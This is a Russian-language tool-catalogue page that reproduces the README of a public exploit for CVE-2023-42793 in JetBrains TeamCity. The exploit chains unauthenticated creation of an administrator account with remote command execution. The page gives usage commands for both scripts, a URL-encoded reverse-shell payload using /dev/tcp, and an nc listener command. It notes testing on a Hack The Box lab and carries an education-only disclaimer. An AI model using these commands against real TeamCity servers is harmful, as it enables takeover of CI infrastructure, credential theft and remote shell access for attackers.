Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - Удаленное выполнение кода (RCE), CVE-2023-42793 | Kitploit
Инструменты/GitHubGitHub/b4l3ri0n/cve-2023-42793
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Удаленное выполнение кода (RCE), CVE-2023-42793

Репозиторий
11332 лет назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-42793 - Создание учётной записи администратора TeamCity, ведущее к RCE

сначала используйте exploit.py для создания учётной записи администратора, затем используйте rce.py для выполнения команд на цели. Для получения reverse shell смотрите это

exploit скрипт

Описание

Этот скрипт эксплуатирует уязвимость CVE-2023-42793 для создания учётной записи администратора на сервере TeamCity. Он отправляет POST-запрос на целевой URL для создания пользователя-администратора с указанными или случайными учётными данными.

Использование

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Параметры

  • -u, --url URL: Целевой URL (обязательно)
  • -v, --verbose: Включить подробный режим
  • -n, --username USERNAME: Указать имя пользователя (по умолчанию: случайное)
  • -p, --password PASSWORD: Указать пароль (по умолчанию: случайный)
  • -e, --email EMAIL: Указать email (по умолчанию: случайный)
  • -t, --token-file: Файл для сохранения токена

Предварительные требования

  • Python 3.x
  • Python libraries
    • Для установки зависимостей: pip3 install -r requirements.txt

Примеры

  1. Эксплойт со случайным именем пользователя, паролем и email:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. Эксплойт с указанными именем пользователя, паролем и email:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

Вывод

При успешной эксплуатации скрипт выводит URL, имя пользователя и пароль созданной учётной записи администратора, затем сохраняет результат в файл токена.

Скрипт удалённого выполнения команд (RCE)

Описание Этот скрипт позволяет выполнять команды на уязвимом сервере TeamCity, используя уязвимость CVE-2023-42793. Сначала он включает процессы отладки, а затем выполняет указанную команду через соответствующие конечные точки API.

Использование

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Параметры

  • -u, --url URL : Целевой URL (обязательно)
  • -t, --token-file : Указать файл, содержащий токен
  • -c, --command COMMAND: Указать команду для выполнения (RCE)
  • -P, --port PORT: Указать порт (по умолчанию 80)

Пример

Эксплойт с указанной командой:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

Для reverse shell

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • В этой команде для reverse shell замените {IP} на ваш IP-адрес, а {port} на порт, который вы слушаете
  • Создайте слушатель с помощью nc, например nc -nvlp 5555
  • Для дополнительной информации смотрите revshells

Примечания

  • Этот скрипт был протестирован на Runner.htb от Hack The Box
  • Этот скрипт предназначен только для образовательных целей.
  • Используйте его ответственно и только на системах, на которые у вас есть разрешение для тестирования.

Авторы

  • Zyad Elsayed
    • Репозиторий GitHub: Zyad-Elsayed
    • Аккаунт LinkedIn: zyad-abdelbary
  • Оригинальный эксплойт для учётной записи администратора: ByteHunter (Exploit-DB)

Ресурсы

  • CVE-2023-42793 Description: Официальное описание уязвимости CVE.
  • Exploit Database Entry: Исходный код эксплойта на Exploit Database.
  • TeamCity Blog: Запись в блоге, обсуждающая уязвимость CVE-2023-42793 в TeamCity.
  • TeamCity Documentation: Официальная документация по TeamCity.
Скачать инструмент